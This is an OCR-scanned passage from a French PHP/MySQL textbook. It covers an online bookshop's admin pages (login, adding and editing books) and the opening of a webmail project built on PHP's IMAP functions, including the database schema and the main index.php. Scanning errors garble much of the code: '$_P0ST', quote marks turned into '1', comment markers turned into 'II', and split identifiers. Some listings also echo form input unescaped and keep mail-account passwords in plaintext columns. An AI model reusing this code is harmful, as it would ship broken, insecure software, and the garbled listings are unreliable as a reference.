possibilites en fonction de l'endroit ou vous vous trouvez. Certains de ces services 
sont effectues en temps reel, contrairement a d'autres : ce choix depend du service 
que vous proposez. S'il s'agit d'un service en ligne, il peut etre interessant de vali- 
der la transaction en temps reel. Si vous vendez des articles materiels, c'est un peu 
moins important. Dans tous les cas, ces fournisseurs de services vous evitent de 
prendre la responsabilite de stocker des numeros de carte de credit. 

■ Vous faire envoyer le numero de carte de credit par e-mail chiffre, par exemple en 
utilisant PGP ou GPG, comme nous l'avons vu au Chapitre 16. Lorsque vous rece- 
vez ces e-mails, vous pouvez les dechiffrer et traiter les transactions manuellement. 

■ Stocker les numeros de cartes de credit dans votre base de donnees. Nous ne vous 
conseillons pas cette approche, a moins que vous ne soyez reellement certain de la 
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securite de votre systeme. Nous vous suggerons de relire le Chapitre 16 pour savoir 
a quel point c'est une mauvaise idee. 

Ces considerations terminent notre etude du module de paiement et du panier virtuel. 

Implementation d'une interface d'administration 

L'interface d'administration que nous avons implementee est tres simple. Nous avons 
seulement mis en place une interface web pour la base de donnees, completee par un 
mecanisme d'authentification, en nous servant principalement du code que nous avions 
mis en oeuvre au Chapitre 25. Nous l'avons recopie ici pour que notre etude soit 
complete, mais ne nous y attarderons pas. 

L'interface d'administration demande aux utilisateurs d'ouvrir une session avec le fichier 
login.php, qui les renvoie ensuite au menu d'administration, admin.php. La page de 
connexion est presentee dans la Figure 26.11. Nous n' avons pas recopie ici le fichier 
login.php pour ne pas nous etendre sur ce sujet et parce qu'il s'agit presque exactement du 
meme fichier que celui du Chapitre 25. Si vous souhaitez 1' examiner, il se trouve sur le 
site Pearson. Le menu d'administration est presente a la Figure 26.12. 
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Les utilisateurs doivent se servir de la page de connexion pour acceder aux fonctions 
d'administration. 



Chapitre 26 



Implementation d'un panier virtue! 641 




File Edit View History Bookmarks Tools Help 




HE 



Bool! uRama 




Administration 



Go to main site 
Add a new category 
Add a new bank 
Change admin password 



Figure 26. 12 

Le menu d'administration permet d'acceder aux fonctions d'administration de la base de donnees. 

Le code du menu d'administration est presente dans le Listing 26.17. 

Listing 26.17 : admin. php — Ce script authentifie I'administrateur et lui permet 
d'acceder aux fonctions d'administration 



// Inclut le fichier de fonctions pour cette application. 
require_once ( ' book_sc_f ns . php ' ) ; 
session_start( ) ; 

if ( ($_P0ST[ 'username' ] ) && ($_P0ST[ 1 passwd ' ] ) ) { 
// Essai de connexion 

$username = $_P0ST[ 1 username '] ; 
$passwd = $_POST[ 1 passwd 1 ] ; 

if ( login ($username, $passwd)) { 

// Si cet utilisateur est dans la base, on enregistre son ID. 
$_SESSI0N[ ' admin_user 1 ] = $username; 



<?php 



} else { 
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II Echec de la connexion 

do_html_header ( "Problem: " ) ; 

echo "<p>You could not be logged in.<br/> 

You must be logged in to view this page.</p>"; 
do_html_url( ' login .php ' , ' Login 1 ) ; 
do_html_f ooter( ) ; 
exit; 

} 

} 

do_html_header( "Administration" ) ; 
if (check_admin_user( ) ) { 

display_admin_menu ( ) ; 
} else { 

echo "<p>You are not authorized to enter the administration area.</p>"; 

} 

do_html_f ooter( ) ; 
?> 



Ce code vous est probablement familier puisqu'il ressemble en effet a un script du 
Chapitre 25. Lorsque 1'administrateur arrive sur ce script, il peut modifier son mot de 
passe ou se deconnecter. Ce code etant identique a celui du Chapitre 25, nous ne le 
detaillerons pas ici. 

Apres sa connexion, nous identifions l'administrateur a l'aide de la variable de session 
admin user et de la fonction check admin user ( ). Cette fonction, ainsi que toutes les 
autres fonctions utilisees par les scripts d' administration, se trouve dans la bibliotheque 
de fonctions admin _Jhs. php. 

Si 1'administrateur choisit d'ajouter une nouvelle categorie ou un nouveau livre, il 
arrive sur insert _category_form.php ou insert J}ook_form.php , en fonction de son 
choix. Ces scripts affichent un formulaire que 1'administrateur doit remplir et qui est 
ensuite traite par un script {insert _category.php ou insert _book.php) qui verifie que le 
formulaire est rempli correctement et qui insere les nouvelles donnees dans la base. 
Nous nous contenterons d'etudier dans ce chapitre l'insertion de nouveaux livres, puisque 
l'insertion d'une nouvelle categorie est tres similaire. 

La page produite par insert _book_form.php est presentee a la Figure 26.13. 

Vous remarquerez que le champ Category des livres est un element HTML SELECT dont 
les options proviennent d'un appel a la fonction get categories () que nous avons 
deja vue. 

Lorsque 1' administrateur clique sur le bouton Add Book, le script insert _book.php est 
active. Son code est presente dans le Listing 26.18. 
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Figure 26. 13 

Ce formulaire permet a I'administrateur d'ajouter de nouveaux livres dans le catalogue en ligne. 

Listing 26.18 : insert_book.php — Ce script valide les donnees d'un nouveau livre et les 
ajoute dans la base de donnees 



<?php 

// Inclut le fichier de fonctions pour cette application. 
require_once ( ' book_sc_f ns . php ' ) ; 
session_start( ) ; 

do_html_header( "Adding a book"); 
if (check_admin_user( ) ) { 
if (filled_out($_POST) ) { 

$isbn = $_P0ST[ ' isbn ' ] ; 

$title = $_POST[ 'title' ] ; 

$author = $_P0ST[ ' author 1 ] ; 

$catid = $_POST[ ' catid ' ] ; 

$price = $_P0ST[ ' price '] ; 

$description = $_P0ST[ ' description '] ; 

if (insert_book($isbn, $title, $author, $catid, 
$price, $description) ) { 
echo "<p>Book <em>" .stripslashes($title) . "</em> was added to the 
database . </p>" ; 

} else { 

echo "<p>Book <em>" .stripslashes($title) . "</em> could not be 
added to the database. </p>" ; 

} 

} else { 

echo "<p>You have not filled out the form. Please try again. </p>"; 

} 
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do_html_url( "admin . php" , "Back to administration menu"); 
} else { 

echo "<p>You are not authorised to view this page.</p>"; 

} 

do_html_f ooter( ) ; 
?> 



Vous pouvez constater que ce script appelle la fonction insert book ( ) . Cette fonction, 
ainsi que toutes les autres fonctions intervenant dans les scripts d' administration, se 
trouve dans la bibliotheque de fonctions admin _fns. php. 

En plus d'ajouter de nouvelles categories et de nouveaux livres, radministrateur peut 
modifier et supprimer ces elements. Nous avons implements cette fonctionnalite en 
reutilisant le code existant au maximum. Lorsque radministrateur clique sur le lien Go 
to main site dans le menu d' administration, il se retrouve sur la page contenant la liste 
des categories, index . php, et peut naviguer sur le site de la meme maniere qu'un utili- 
sateur classique, en utilisant les memes scripts. 

Cependant, la navigation des administrateurs est un peu differente. Les options qui leur 
sont proposees ne sont pas les memes que celles des utilisateurs classiques, puisqu'ils 
utilisent la variable de session admin user. Par exemple, si vous comparez avec la page 
show_book.php que nous avons deja vue dans ce chapitre, vous pouvez constater que le 
menu des options est legerement different (voir Figure 26.14). 
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Figure 26. 14 

Le script show_book.php produit un affichage different pour les administrateurs. 
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Sur cette page, l'administrateur a acces a de nouvelles options : Edit Item et Admin 
Menu. Vous remarquerez egalement qu'aucun panier virtuel n'est affiche dans le coin 
superieur droit de la page. Celui-ci est remplace par un bouton Log Out. 

Le code de cette fonctionnalite, qui se trouve dans le Listing 26.8, est le suivant : 

if (check_admin_user( ) ) { 

display_button( "edit_book_f orm. php?isbn=" .$isbn, "edit-item" , 
"Edit Item"); 

display_button( "admin. php" , "admin-menu", "Admin Menu"); 

display_button($target, "continue", "Continue"); 

} 

Si vous reprenez le script show_cat.php, vous constaterez qu'il contient egalement ces 
options. 

Si l'administrateur clique sur le bouton Edit Item, il sera redirige vers le script 
edit_book_form.php, dont la sortie est presentee a la Figure 26.15. 
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Figure 26.15 

Le script edit_book_form.php permet a l'administrateur de modifier les informations sur un livre 
ou de supprimer un livre. 



II s'agit en fait du meme formulaire que celui que nous avions utilise pour lire les infor- 
mations sur un livre. Nous y avons integre une option pour transmettre et afficher les 
donnees associees a un livre existant et nous avons fait de meme avec le formulaire des 
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categories de livres. Pour mieux comprendre tout cela, interessons-nous au 
Listing 26.19. 

Listing 26.19 : La fonction display _book_form() de adminjfns.php — Ce formulaire sert 
a la fois de formulaire d'insertion et de formulaire de modification 



function display_book_f orm($book = '') { 

// Cette fonction affiche le formulaire des livres. 

// Elle ressemble beaucoup au formulaire des categories. 

// Ce formulaire permet d'ajouter et de modifier des livres. 

// Pour ajouter un livre, ne passez aucun parametre. Cela met $edit 

// a false et le formulaire passe ensuite a ajout_livre.php. 

// Pour mettre a jour, passez un tableau contenant les donnees d'un 

// livre. Le formulaire s'affichera avec les anciennes donnees et 

// pointera sur update_book . php . 

// II ajoutera egalement un bouton "Delete book". 

// Si on transmet les donnees d'un livre, on passe en mode edition. 
$edit = is_array ($book) ; 

// L'essentiel de ce formulaire est du code HTML, 
// avec un peu de code PHP. 

?> 

<form method="post" 

action="<?php echo $edit ? 'edit_book.php' : ' insert_book . php ' ;?>"> 
<table border="0"> 
<tr> 

<td>ISBN:</td> 

<td><input type="text" name="isbn" 

value="<?php echo $edit ? $book[ ' isbn ' ] : ''; ?>" /></td> 

</tr> 
<tr> 

<td>Book Title:</td> 

<td><input type="text" name="title" 

value="<?php echo $edit ? $book[ 'title' ] : ''; ?>" /></td> 

</tr> 
<tr> 

<td>Book Author:</td> 

<td><input type="text" name="author" 

value="<?php echo $edit ? $book[ 'author' ] : 11 ; ?>" /></td> 

</tr> 
<tr> 

<td>Category :</td> 
<td><select name="catid"> 
<?php 

// La liste des categories possibles vient de la base 
$cat_array=get_categories ( ) ; 
foreach ($cat_array as $thiscat) { 

echo "<option value=\ " " .$thiscat [ ' catid ' ] . " \ " " ; 
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// Si le livre existe, on le place dans la categorie 
// courante. 

if (($edit) && ($thiscat[ 'cat id' ] == $book[ ' catid ' ] ) ) { 
echo " selected"; 

} 

echo ">" .$thiscat[ ' catname ' ] . "</option>" ; 

} 

?> 

</select> 
</td> 

</tr> 
<tr> 
<td>Price:</td> 

<td><input type="text" name=" price" 

value="<?php echo $edit ? $book[ ' price ' ] : ''; ?>" /></td> 

</tr> 
<tr> 

<td>Description :</td> 
<td><textarea rows="3" cols="50" 
name="description"> 

<?php echo $edit ? $book[ 'description ' ] : ' ' ; ?> 
</textarea></td> 

</tr> 
<tr> 

<td <?php if (!$edit) { echo "colspan=2"; }?> align="center"> 
<?php 

if ($edit) 

// On a besoin de l'ancien ISBN pour trouver le livre dans 
// la base de donnees. 
// Si 1' ISBN est modifie 

echo "<input type=\ " hidden\ " name=\ "oldisbn\ " 
value=\"".$book['isbn']."\" />"; 

?> 

<input type="submit" 

value="<?php echo $edit ? 'Update' : 'Add'; ?> Book" /> 
</f orm></td> 
<?php 

if ($edit) { 
echo "<td> 

<form method=\"post\" action=\ "delete_book . php\ "> 
<input type=\"hidden\" name=\ "isbn\ " 
value=\"".$book['isbn']."\" /> 
<input type=\"submit\" value=\ "Delete book\"/> 
</form></td>" ; 

} 

?> 
</td> 
</tr> 
</table> 
</f orm> 
<?php 
} 
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Si nous passons en parametre un tableau contenant les donnees d'un livre, ce formulaire 
passe en mode d'edition et remplit les champs avec les donnees existantes : 

<input type="text" nom="price" 

value="<?php echo $edit?$book[ 1 price ']: 1 1 ; ?>"> 

Nous obtenons meme un autre bouton d'envoi. En fait, il en existe deux pour le formu- 
laire d'edition (un pour mettre a jour le livre, un autre pour le supprimer). Ces boutons 
appellent respectivement les scripts _edit_book.php et delete _book.php, qui mettent a 
jour la base de donnees en consequence. 

L' equivalent de ces scripts pour la gestion des categories de livres fonctionne de la 
meme maniere, a un detail pres. Lorsqu'un administrateur tente de supprimer une 
categorie, celle-ci n'est pas supprimee si elle contient encore des livres, ce que nous 
verifions a l'aide d'une requete sur la base de donnees. Cela nous permet d'eviter 
certains problemes que nous aurions en cas de suppression intempestive (nous avons 
aborde ces problemes au Chapitre 8). Dans notre cas, si une categorie contenant des 
livres etait supprimee, ces livres deviendraient orphelins : il serait done impossible 
de savoir dans quelle categorie ils se trouvent ni de les retrouver en passant par 
1' interface du site ! 

Ceci termine notre etude de l'interface d' administration. Pour plus de details, reportez- 
vous au code source des exemples de cet ouvrage. 

Pour aller plus loin 

Nous avons implemente un systeme de panier virtuel relativement simple. II existe 
plusieurs ameliorations que nous pourrions y apporter : 

■ Pour un veritable magasin en ligne, il serait interessant d'implementer un systeme 
de suivi de commande. Pour l'instant, il n'existe aucun moyen de suivre les 
commandes qui ont ete effectuees. 

■ Les clients doivent pouvoir suivre la progression de leurs commandes sans vous 
contacter. Nous pensons qu'il est important qu'un client n'ait pas besoin de 
s'authentifier pour consulter le catalogue en ligne. Cependant, le simple fait 
d'authentifier les clients leur permet de consulter leurs commandes anterieures et 
vous permet d'effectuer des statistiques pour essayer d'etablir des profils de clients. 

■ Pour l'instant, les images des livres doivent etre envoyees vers le repertoire 
d'images par FTP et il faut leur donner un nom correct. II serait interessant de 
pouvoir charger ces fichiers dans la page d' insertion des nouveaux livres. 

I Vous pourriez implementer un systeme de connexion pour les utilisateurs, person- 
naliser le site en fonction des clients, conseiller des livres, ou encore proposer des 
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resumes en ligne, des programmes de fidelisation, des systemes de verification des 
stocks, etc. 

Utilisation d'un systeme existant 

Si vous souhaitez utiliser un systeme de panier virtuel tres complet et pret a l'emploi, il 
peut etre interessant d'etudier les systemes de panier virtuel existants. FishCartSQL, 
notamment, est ecrit en PHP et disponible sous licence open-source. Vous pouvez 
l'obtenir a partir du site http://www.fishcart.org/. 

Ce systeme inclut plusieurs caracteristiques evoluees, comme le suivi des clients, des 
statistiques sur les ventes, la gestion de plusieurs langages, le traitement des cartes de 
credit et la possibilite de gerer plusieurs magasins en ligne sur le meme serveur. Natu- 
rellement, lorsqu'on utilise un systeme developpe par quelqu'un d'autre, on n'est 
jamais entierement satisfait de ses fonctionnalites, mais l'avantage des produits open- 
source est que vous pouvez les modifier en fonction de vos besoins. 

Pour la suite 

Dans le chapitre suivant, nous verrons comment implementer un webmail, c'est-a-dire 
un systeme de reception et d'envoi de courrier electronique via une interface web. Ce 
systeme reposera sur le protocole IMAP. 
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Implementation d'un webmail 

Aujourd'hui, de plus en plus de sites offrent un webmail a leurs clients, c'est-a-dire une 
application web leur permettant de recevoir, d'organiser et d'envoyer des courriers via 
leur navigateur. Dans ce chapitre, nous verrons comment implementer une interface 
web vers un serveur de courrier existant en utilisant la bibliotheque IMAP de PHP. Vous 
pourrez l'utiliser pour consulter votre boite aux lettres dans une page web et, si vous le 
souhaitez, vous pourrez l'ameliorer pour qu'elle puisse gerer plusieurs utilisateurs, 
comme GMail, Yahoo! Mail et Hotmail. 

Dans ce projet, nous construirons un client de courrier, Warm Mail, permettant aux 
utilisateurs de : 

■ se connecter a leurs comptes POP3 ou IMAP ; 

■ lire leur courrier ; 

■ envoyer du courrier ; 

I repondre au courrier ; 

■ faire suivre leur courrier ; 

■ supprimer des messages de leurs boites aux lettres. 

Composants de la solution 

Pour qu'un utilisateur puisse lire son courrier, il faut disposer d'un moyen de le connec- 
ter a son serveur de courrier, qui est, generalement, une machine differente de celle du 
serveur web. II faut egalement pouvoir interagir avec la boite aux lettres de l'utilisateur 
pour savoir les messages qu'il a recus et les traiter individuellement. 
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Les protocoles de courrier POP3 et IMAP 

Les deux protocoles principaux reconnus par les serveurs de courrier pour lire les boites 
aux lettres s'appellent POP3 (Post Office Protocol version 3) et IMAP (Internet 
Message Access Protocol). Dans la mesure du possible, il est preferable de pouvoir 
gerer les deux. 

POP3 a ete concu pour les personnes qui se connectent a un reseau pendant un court 
instant afin de telecharger et de supprimer leur courrier du serveur. IMAP, au contraire, 
est concu pour une utilisation en ligne, pour interagir avec les messages qui restent en 
permanence sur le serveur distant. En outre, IMAP dispose de fonctionnalites plus 
avancees que nous n'utiliserons pas ici. 

Si les differences entre ces deux protocoles vous interessent, consultez leurs RFC (RFC 
1939 pour POP3 et RFC 3501 pour IMAP). Vous pouvez egalement lire un excellent 
article comparatif sur la page http://www.imap.org/papers/imap.vs.pop.brief.htmI. 

Aucun de ces deux protocoles n'a ete prevu pour envoyer du courrier : pour cela, vous 
devez utiliser SMTP (Simple Mail Transfer Protocol), que nous avons deja utilise via la 
fonction mail ( ) de PHP. Ce protocole est decrit par la RFC 821. 

Gestion de POP3 et IMAP en PHP 

PHP reconnait parfaitement les protocoles POP3 et IMAP, qui sont tous les deux geres 
par la bibliotheque IMAP. Pour utiliser le code presente dans ce chapitre, vous devez 
avoir installe cette bibliotheque. La sortie de la fonction phpinf o( ) vous permettra de 
savoir si elle est deja installee sur votre systeme. 

Si vous utilisez Linux ou FreeBSD et que cette bibliotheque ne soit pas installee, vous 
pourrez 1' installer via le systeme des paquetages de votre distribution ou le systeme des 
ports de FreeBSD. 

S'il n'existe pas de paquetage tout pret pour votre systeme Unix, telechargez par FTP 
1' archive contenant les fichiers sources necessaries a partir de l'URL ftp:// 
ftp.cac.washington.edu/imap/ puis compilez-les en suivant les instructions fournies 
avec ces sources. 

Vous devrez ensuite creer un repertoire dans le repertoire des fichiers inclus de votre 
systeme, par exemple imap pour y copier les fichiers IMAP (ne copiez pas ces fichiers 
directement dans le repertoire des fichiers inclus car cela pourrait causer des conflits). 
Dans ce nouveau repertoire, creez deux sous-repertoires, imap/lib et imap/include, et 
copiez tous les fichiers .h de votre repertoire d' installation dans imap/include. La 
compilation a du creer un fichier client.a : renommez-le en libc-client.a et copiez-le 
dans le repertoire imap/lib. 
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Puis lancez le script de configuration de PHP, en ajoutant l'option with imap=nomrep 
(ou nomrep est le nom du repertoire que vous avez cree) aux autres parametres que vous 
utilisez d'ordinaire, et recompilez PHP 

Pour utiliser l'extension IMAP avec Windows, ouvrez votre fichier php.ini et decom- 
mentez la ligne suivante : 

extension=php_imap . dll 

puis relancez le serveur web. 

Si une section IMAP apparait dans le resultat de phpinfo(), c'est que l'extension 
IMAP a bien ete installee. 

Un point interessant a noter est que les fonctions de cette bibliotheque fonctionnent 
egalement avec POP3 et NNTP {New News Transfer Protocol), bien qu'on les appelle 
"fonctions IMAP". Ici, nous les utiliserons pour POP3 et IMAP, mais vous pourriez 
aisement etendre Warm Mail pour en faire egalement un client Usenet. 

Bien que la bibliotheque comporte plusieurs fonctions, nous n'en utiliserons que quel- 
ques-unes que nous presenterons au fur et a mesure. Pour connaitre toutes les fonctions 
disponibles, consultez la documentation : vos besoins peuvent etre differents des notres 
ou vous pouvez avoir envie d'implementer des fonctionnalites supplementaires dans 
votre application. 

Avec une infime partie des fonctions predefmies, vous pouvez deja construire une appli- 
cation de courrier tout a fait utilisable et cela signifie egalement qu'il n'y a besoin de 
consulter qu'une infime partie de la documentation de cette bibliotheque. Les fonctions 
IMAP que nous utiliserons dans ce chapitre sont : 



■ 


imap 


open ( ) 


■ 


imap 


close ( ) 


■ 


imap 


headers( ) 


■ 


imap 


f etchheader ( 


■ 


imap 


body() 


■ 


imap 


delete() 


■ 


imap 


expunge( ) 



Pour qu'un utilisateur puisse lire son courrier, vous devez connaitre les details concer- 
nant son serveur et son compte. Au lieu de les lui demander a chaque fois, vous pouvez 
stacker le nom et le mot de passe de chaque utilisateur dans une base de donnees, ce qui 
vous permettra d'y associer les details requis. 
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Sou vent, les internautes ont plusieurs comptes de courrier (un pour la maison, 1' autre 
pour le bureau, par exemple) et vous devriez les autoriser a se connecter a n'importe 
lequel de leurs comptes : vous devez done gerer dans la base de donnees plusieurs 
ensembles d' informations de comptes courrier pour un meme utilisateur. 

Les utilisateurs doivent pouvoir lire, repondre, faire suivre et supprimer les messages de 
courriers existants, ainsi qu'en envoy er de nouveaux. Toutes les parties concernant la 
lecture peuvent s'effectuer avec IMAP ou POP3 et tout ce qui concerne l'envoi doit 
s'effectuer avec SMTP via mail ( ) . 

Voyons maintenant comment rassembler les pieces de ce puzzle. 



Resume de la solution 

Le deroulement general de ce systeme web n'est pas tres different de celui des autres 
clients de courrier. La Figure 27.1 presente le diagramme qui illustre le flux de 1' appli- 
cation et les differents modules utilises. 



Connexion 




Figure 27. 1 

/.'interface de Warm Mail permet a I'utilisateur de manipuler sa boite aux lettres et de gerer 
ses messages. 



Comme vous pouvez le constater, I'utilisateur doit d'abord s'authentifier avant de 
pouvoir choisir une des options possibles. II peut creer un nouveau compte de courrier 
ou en choisir un existant. II peut egalement consulter le courrier qu'il a recu, repondre, 
faire suivre ou supprimer les messages et envoyer du courrier. 
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II peut egalement consulter les en-tetes detailles d'un message particulier, ce qui lui 
permet d'en apprendre beaucoup plus sur ce message : la machine d'ou il a ete envoye 
(ce qui est tres utile pour gerer les spams), celles qui l'ont relaye et a quel instant le 
message a atteint chaque note (ce qui permet de savoir qui est responsable du retard 
d'un courrier). II peut egalement savoir quel est le client de courrier qui a ete utilise si 
cette application a ajoute cette information aux en-tetes. 

Ce projet utilise une architecture d'application un peu differente. Au lieu d'utiliser 
plusieurs scripts, un par module, il repose sur un script un peu plus long, index.php, qui 
fonctionne comme la boucle d'evenements des toolkits graphiques. Chaque clic d'un 
bouton sur le site ramenera l'utilisateur a index.php, mais avec un parametre different. 
Ce dernier correspond a des appels de fonctions distinctes qui afficheront des informa- 
tions differentes a l'utilisateur. Comme d'habitude, toutes ces fonctions sont regroupees 
dans la bibliotheque de 1' application. 

Cette architecture convient tres bien a de petites applications comme celle-ci. Elle est 
parfaitement adaptee aux applications pilotees par des evenements, ou les differentes 
fonctionnalites sont declenchees par les actions des utilisateurs. En revanche, un unique 
gestionnaire d'evenement ne convient pas aux architectures plus complexes ou aux 
projets developpes en equipe. 

Le Tableau 27.1 enumere les fichiers utilises par le projet Warm Mail. 



Tableau 27.1 : Fichiers utilises par I'application Warm Mail 



Nom 


Type 


Description 


index . php 


Application 


Le script principal de I'application 


include fns.php 


Fonctions 


Collection de fichiers inclus pour I'application 


data valid fns.php 


Fonctions 


Collection de fonction de validation des donnees 
saisies 


db fns.php 


Fonctions 


Collection de fonctions pour se connecter a la base 
de donnees mail 


mail fns.php 


Fonctions 


Collection de fonctions de courrier pour ouvrir les 
boites aux lettres, lire le courrier, etc. 


output fns.php 


Fonctions 


Collection de fonctions pour produire du HTML 


user auth fns.php 


Fonctions 


Collection de fonctions pour authentifier les 
utilisateurs 


create database. sql 


SQL 


Code SQL pour creer la base de donnees mail ainsi 
qu'un utilisateur 
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Creation de la base de donnees 

La base de donnees de Warm Mail est assez simple car, en realite, elle ne stocke aucun 
e-mail. 

II faut enregistrer les utilisateurs de 1' application, c'est-a-dire pour chacun d'eux : 

■ username, le nom d'utilisateur choisi pour 1' application. 

■ password, le mot de passe de l'utilisateur. 

■ address, l'adresse e-mail de l'utilisateur, qui apparaitra dans le champ From des 
messages qu'il envoie avec 1' application. 

■ displayname, le nom "risible" de l'utilisateur, qui sera mentionne dans les courriers 
qu'il envoie. 

Vous devez egalement enregistrer tous les comptes que les utilisateurs souhaitent utiliser 
avec 1' application. Pour chaque compte, vous devez stacker les informations suivantes : 

■ username, l'utilisateur de Warm Mail auquel appartient ce compte. 

■ server, la machine sur laquelle se trouve le compte ; par exemple localhost, 
mail . tangleweb . com . au ou un autre domaine. 

■ port, le port sur lequel se connecter pour utiliser ce compte. II s'agit generalement 
du port 110 pour les serveurs POP3 et du port 143 pour les serveurs IMAP. 

■ type, le protocole utilise pour se connecter au serveur, c'est-a-dire P0P3 ou IMAP. 

■ remoteuser, le nom d'utilisateur pour se connecter au serveur de courrier. 

■ remotepassword, le mot de passe pour se connecter au serveur de courrier. 

■ accountid, une cle unique pour identifier les comptes. 

Pour creer la base de donnees, vous pouvez utiliser le script SQL du Listing 27.1. 

Listing 27.1 : create_database.sql — Script pour creer la base de donnees mail et un 
utilisateur 

create database mail; 
use mail; 

create table users 
( 

username char(16) not null primary key, 
password char(40) not null, 
address char(100) not null, 
displayname char(100) not null 

); 
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create table accounts 
( 

username char(16) not null, 
server char(100) not null, 
port int not null, 
type char(4) not null, 
remoteuser char(50) not null, 
remotepassword char(50) not null, 

accountid int unsigned not null auto_increment primary key 

); 

grant select, insert, update, delete 
on mail.* 

to mail@localhost identified by 'password 1 ; 



Pour executer ce code SQL, utilisez la commande suivante : 

mysql -u root -p < create_database . sql 

Vous devrez fournir le mot de passe de root, et n'oubliez pas non plus de modifier celui 
de l'utilisateur de la base de donnees dans create _database.sql et dans db_fns.php avant 
de 1' executer. 

Dans le code source du livre, vous trouverez un fichier populate . sql. Dans cette appli- 
cation, nous n'utiliserons ni procedure d'enregistrement des utilisateurs ni procedure 
d'administration. Si vous souhaitez utiliser ce systeme a plus grande echelle, rien ne 
vous empeche d'ajouter ces fonctionnalites mais, pour un besoin personnel, il suffira 
de vous inserer vous-meme dans la base de donnees. Le script populate . sql fournit un 
modele pour le faire : vous pouvez inserer vos coordonnees dans ce script et 1' exe- 
cuter afin de vous creer un compte utilisateur. 

Architecture du script 

Comme on l'a indique plus haut, l'application Warm Mail n'utilise qu'un seul script 
pour tout controler. Ce script s'appelle index.php et son code est presente dans le 
Listing 27.2. Comme il est assez long, nous le detaillerons section par section. 

Listing 27.2 : index.php — La colonne vertebrale du systeme Warm Mail 



<?php 

// Ce fichier constitue le corps principal de l'application Warm Mail 
//II fonctionne essentiellement comme une machine a etats et presente 
// a l'utilisateur un affichage qui correspond a l'action qu'il a choisie. 

// Etape 1: pretraitement 

// Effectue tous les traitements necessaires avant d'envoyer l'en-tete de 
page et decide des details a montrer dans les en-tetes. 
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include ( ' include_f ns . php 1 ) ; 
session_start() ; 

// Creation de variables aux noms courts 
$username = $_P0ST[ 1 username ' ] ; 
$passwd = $_P0ST[ 1 passwd 1 ] ; 
$action = $_REQUEST[ ' action 1 ] ; 
$account = $_REQUEST[ 1 account '] ; 
$messageid = $_GET[ 'messageid ' ] ; 



$to = $_P0ST[ 'to' ] 
$cc = $_P0ST[ 1 cc 1 ] 
$subject = $_P0ST[ 



subject ' ] 



$message = $_P0ST[ 'message 1 ] ; 



$buttons = array ( ) ; 



// Ajoute a cette chaine si quelque chose est traite avant d'envoyer 
// l'en-tete. 
$status = ' ' ; 

// On doit traiter les requetes de connexion et de deconnexion avant 
// toute chose, 
if ($username | | $password) { 
if (login($username, $passwd)) { 
$status .= "<p style=\ "padding-bottom: 100px\ ">Logged in 

successfully. </p>" ; 
$_SESSION[ ' auth_user ' ] = $username; 
if (number_of_accounts($_SESSION[ 'auth_user' ] )==1 ) { 
$accounts = get_account_list ($_SESSI0N[ ' auth_user ' ] ) ; 
$_SESSI0N[ ' selected_account 1 ] = $accounts[0] ; 

} 

} else { 

$status .= "<p style=\ "padding-bottom: 100px\"> 

Sorry, we could not log you in with that username and 
password. </p>" ; 

} 

} 



if($action == 'log-out') { 
session_destroy ( ) ; 
unset ($action) ; 
$_SESSION=array() ; 



// On doit traiter le choix, la suppression ou le stockage du compte 
// avant d'afficher les en-tetes. 
switch ($action) { 

case ' delete-account ' : 
delete_account($_SESSION[ 'auth_user' ] , $account) ; 

break; 

case 'store-settings': 

store_account_settings($_SESSION[ 'auth_user' ] , $_P0ST) ; 
break; 
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case 'select-account': 

// Si l'on a choisi un compte valide, on le stocke dans une 
// variable de session. 

if ( ($account) && (account_exists ($_SESSI0N[ ' auth_user ' ] , 
$account))) { 
$_SESSI0N[ ' selected_account ' ] = $account; 

} 

break; 

} 

// Cree les boutons qui apparaitront dans la barre d'outils 
$buttons[0] = 'view-mailbox'; 
$buttons[1] = 'new-message'; 
$buttons[2] = 'account-setup'; 

// II n'y a un bouton de deconnexion que si l'on est connecte 
if (check_auth_user( ) ) { 
$buttons[4] = 'log-out'; 

} 

*********************************************************************** 
// Etape 2 : en-tetes 

// Envoi des en-tetes HTML et de la barre de menu correspondant a 

// l'action courante. 

*********************************************************************** 

if($action) { 

// Affiche un en-tete avec le nom de 1 ' application et la description 
// de la page ou de l'action. 

do_html_header($_SESSION[ 'auth_user' ] , "Warm Mail - ". 
format_action($action) , 
$_SESSI0N[ ' selected_account ' ] ) ; 

} else { 

// Affiche un en-tete ne contenant que le nom de 1 ' application . 
do_html_header($_SESSION[ 'auth_user' ] , "Warm Mail", 
$_SESSION[ ' selected_account 1 ] ) ; 

} 

display_toolbar($buttons) ; 

*********************************************************************** 
// Etape 3 : corps du script 

// Montre le contenu correspondant a l'action choisie 

I y*********************************************************************** 

// Affiche le texte produit par les fonctions appelees avant 
// les en-tetes. 
echo $status; 

if ( !check_auth_user() ) { 
echo "<p>You need to log in"; 

if(($action) && ($action !=' log-out ') ) { 
echo " to go to " .format_action($action) ; 

} 

echo " .</p>" ; 
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display_login_f orm($action) ; 
} else { 

switch ($action) { 

// Affiche la page de configuration de compte si l'on a choisi de 
// creer un compte ou que l'on vient d'ajouter ou de supprimer un 
// compte 

case 'store-settings': 

case 'account-setup': 

case ' delete-account ' : 

display_account_setup($_SESSION[ ' auth_user ' ] ) ; 
break ; 

case ' send-message ' : 

if (send_message($to, $cc, $subject, $message)) { 

echo "<p style=\"padding-bottom: 100px\ ">Message sent.</p>"; 
} else { 

echo "<p style=\"padding-bottom: 100px\"> 
Could not send message. </p>" ; 

} 

break ; 

case ' delete ' : 

delete_message($_SESSION[ 'auth_user' ] , 

$_SESSION[ ' selected_account ' ] , $messageid) ; 
// Notez 1' absence volontaire de 'break' pour passer au cas 
// suivant. 

case 'select-account': 

case 'view-mailbox': 

// Affiche la boite aux lettres si celle-ci a ete choisie ou 
// qu'on a demande a la voir. 
display_list($_SESSION[ 'auth_user' ] , 

$_SESSION[ ' selected_account ' ] ) ; 

break; 

case 'show-headers': 
case ' hide-headers ' : 
case ' view-message ' : 

// Charge un message si on a selectionne un message dans la liste 

// ou que l'on examinait un message et que l'on souhaite cacher 

// ou afficher ses en-tetes. 

$fullheaders = ($action == 'show-headers'); 

display_message($_SESSION[ 'auth_user' ] , 

$_SESSION [ ' selected_account ' ] , 
$messageid, $f ullheaders) ; 

break; 

case ' reply-all ' : 

// Configure cc comme ancienne ligne cc 
if(!$imap) { 
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$imap = openjnailbox ($_SESSI0N [ ' auth_user ' ] , 

$_SESSI0N [ ' selected_account ' ] ) ; 

} 

if($imap) { 
$header = imap_header($imap, $messageid); 

if ($header->reply_toaddress) { 

$to = $header->reply_toaddress; 
} else { 

$to = $header->f romaddress; 

} 

$cc = $header->ccaddress; 
$subject = "Re: " .$header->subject; 
